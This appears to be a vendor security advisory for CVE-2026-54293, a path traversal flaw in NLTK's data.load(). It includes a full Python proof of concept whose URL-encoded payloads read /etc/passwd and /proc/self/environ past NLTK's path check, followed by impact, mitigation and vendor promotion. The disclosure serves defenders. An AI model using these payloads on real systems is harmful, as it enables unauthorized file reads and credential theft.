CVE-2026-54293

CVE-2026-54293 is a high-severity path traversal vulnerability in nltk (pip), affecting versions <= 3.9.4. No fixed version is listed yet.

Summary

nltk.data.load() in NLTK is vulnerable to path traversal via URL-encoded path separators and traversal segments when using the nltk: URL scheme. The unsafe-path regex check is performed before url2pathname() decodes the %xx sequences (a classic decode-after-check / TOCTOU-style flaw), allowing an attacker to bypass the protection documented in NLTK's SECURITY.md and read arbitrary files from the filesystem.
While literal traversal strings such as ../../../etc/passwd are correctly blocked, encoded variants such as %2fetc%2fpasswd, %2e%2e%2f..., and ..%2f..%2f slip past the regex and are subsequently decoded into a real filesystem path.

Affected Component

nltk/data.py, find(), normalize_resource_url(), and the _UNSAFE_NO_PROTOCOL_RE regex check.
Relevant occurrences:

data.py L650–L653, final path constructed from url2pathname(resource_name) after checks
data.py L54–L69, _UNSAFE_NO_PROTOCOL_RE operates only on the undecoded string
data.py L219–L245, normalize_resource_url() for nltk: scheme contributes to decode-after-check
data.py L615–L618, defense-in-depth traversal check also operates on undecoded input

Root Cause
The regex _UNSAFE_NO_PROTOCOL_RE is matched against the raw resource string. Path normalization via url2pathname() happens later, so any percent-encoded / (%2f) or . (%2e) is invisible to the regex but becomes active in the final path.

Proof of Concept

"""
NLTK Arbitrary File Read via URL-Encoded Path Traversal
=======================================================
Bypasses _UNSAFE_NO_PROTOCOL_RE security regex in nltk/data.py
by URL-encoding path separators and traversal components.

Affected: NLTK <= 3.9.4 (default ENFORCE=False configuration)
CWE: CWE-22 (Path Traversal)

Root Cause:
  nltk/data.py:find() checks resource names against a regex for
  traversal patterns (../, leading /, etc.) BEFORE calling
  url2pathname() which decodes %xx sequences. This is a classic
  "decode-after-check" vulnerability.
"""

import sys
import os
import warnings

# Suppress NLTK security warnings for clean PoC output
warnings.filterwarnings("ignore", category=RuntimeWarning)

# Setup
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "nltk"))
os.makedirs(os.path.expanduser("~/nltk_data/corpora"), exist_ok=True)

import nltk
from nltk.pathsec import ENFORCE

BANNER = """
===================================================
 NLTK URL-Encoded Path Traversal PoC
 Affected: nltk <= 3.9.4
 Default ENFORCE={enforce}
===================================================
""".format(enforce=ENFORCE)

def test_variant(name, payload, fmt="raw"):
    """Test a single traversal variant."""
    try:
        content = nltk.data.load(payload, format=fmt)
        if isinstance(content, bytes):
            preview = content[:200].decode("utf-8", errors="replace")
        else:
            preview = content[:200]
        first_line = preview.split("\n")[0]
        print(f"  [VULN] {name}")
        print(f"         Payload: {payload}")
        print(f"         Read OK: {first_line}")
        return True
    except Exception as e:
        print(f"  [SAFE] {name}")
        print(f"         Payload: {payload}")
        print(f"         Blocked: {type(e).__name__}: {e}")
        return False


def main():
    print(BANNER)
    vulns = 0

    # --- Variant 1: URL-encoded absolute path ---
    print("[1] URL-encoded absolute path (%2f = /)")
    if test_variant(
        "Encoded leading slash bypasses ^/ regex check",
        "nltk:%2fetc%2fpasswd",
    ):
        vulns += 1

    print()

    # --- Variant 2: Encoded dot-dot traversal ---
    print("[2] URL-encoded dot-dot traversal (%2e = .)")
    if test_variant(
        "Encoded dots bypass \\.\\./ regex check",
        "nltk:corpora/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    ):
        vulns += 1

    print()

    # --- Variant 3: Literal dots with encoded slash ---
    print("[3] Literal dots with encoded slash (..%2f)")
    if test_variant(
        "Encoded slash after literal .. bypasses \\.\\./ regex",
        "nltk:corpora/..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
    ):
        vulns += 1

    print()

    # --- Variant 4: Read process environment (credential leak) ---
    print("[4] Read /proc/self/environ (credential leakage)")
    try:
        content = nltk.data.load("nltk:%2fproc%2fself%2fenviron", format="raw")
        env_vars = content.decode("utf-8", errors="replace").split("\x00")
        print(f"  [VULN] Leaked {len(env_vars)} environment variables")
        for var in env_vars[:3]:
            if var:
                key = var.split("=")[0] if "=" in var else var
                print(f"         {key}=...")
        vulns += 1
    except Exception as e:
        print(f"  [SAFE] Blocked: {e}")

    print()

    # --- Control: verify normal traversal IS blocked ---
    print("[CONTROL] Verify literal ../ is blocked by regex")
    test_variant("Direct traversal (should be blocked)", "nltk:../../../etc/passwd")

    print()
    print("=" * 51)
    print(f" Result: {vulns} bypass variant(s) succeeded")
    if vulns > 0:
        print(" Status: VULNERABLE (url2pathname decodes after regex check)")
    else:
        print(" Status: Not vulnerable")
    print("=" * 51)


if __name__ == "__main__":
    main()

Impact

Arbitrary local file read whenever attacker-controlled input reaches nltk.data.load(). Realistic targets include:

/etc/passwd, /etc/shadow (if readable)
/proc/self/environ, leaks environment variables, often containing API keys, DB credentials, cloud secrets
Application source code and configuration files
Cloud metadata, deployment secrets, SSH keys

This is directly relevant to web applications, hosted notebook services, multi-tenant ML pipelines, and CI/CD systems that pass untrusted resource identifiers into NLTK. NLTK's SECURITY.md explicitly places path traversal within the scope of its protection model, so this is a documented security boundary being broken.

Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.

CVE-2026-54293 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.

Affected versions

nltk (<= 3.9.4)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

No fixed version is listed for CVE-2026-54293 yet.

In the interim: Resolve the canonical path after applying any user-supplied input, and verify it remains within the intended directory before accessing it.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-54293? CVE-2026-54293 is a high-severity path traversal vulnerability in nltk (pip), affecting versions <= 3.9.4. No fixed version is listed yet. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
  2. How severe is CVE-2026-54293? CVE-2026-54293 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of nltk are affected by CVE-2026-54293? nltk (pip) versions <= 3.9.4 is affected.
  4. Is there a fix for CVE-2026-54293? No fixed version is listed for CVE-2026-54293 yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is CVE-2026-54293 exploitable, and should I be worried? Whether CVE-2026-54293 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-54293 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-54293? No fixed version is listed yet. In the interim: Resolve the canonical path after applying any user-supplied input, and verify it remains within the intended directory before accessing it.

Other vulnerabilities in nltk

CVE-2026-54293CVE-2026-33236CVE-2026-33230CVE-2026-0846CVE-2026-0847

Stop the waste.
Protect your environment with Kodem.